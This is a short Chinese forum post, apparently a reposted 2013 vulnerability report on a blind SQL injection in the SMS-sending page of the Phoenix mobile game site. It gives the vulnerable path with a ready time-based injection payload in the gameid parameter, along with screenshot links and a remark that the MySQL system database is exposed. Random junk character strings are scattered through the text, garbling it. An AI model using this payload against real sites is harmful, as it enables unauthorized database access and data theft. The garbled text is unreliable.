简要描述:: o$ l. }: M% I s P( k2 z5 B
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
( T. ?% D% I( K/ N& i" l! b% f% S2 V2 Q, M3 I( F6 `' G
详细说明:/ m3 B8 ~' X8 {8 ^9 p
存在SQL盲注url:& N3 m* @1 p& i1 E
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=11 o# q+ j3 C5 Y
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
/ V# x* ]3 @+ ~http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png: G; V' X) A, }0 A) X
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
; N; j( ?2 N* f0 [. U5 C! f6 J/ U7 @$ q& C3 u
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对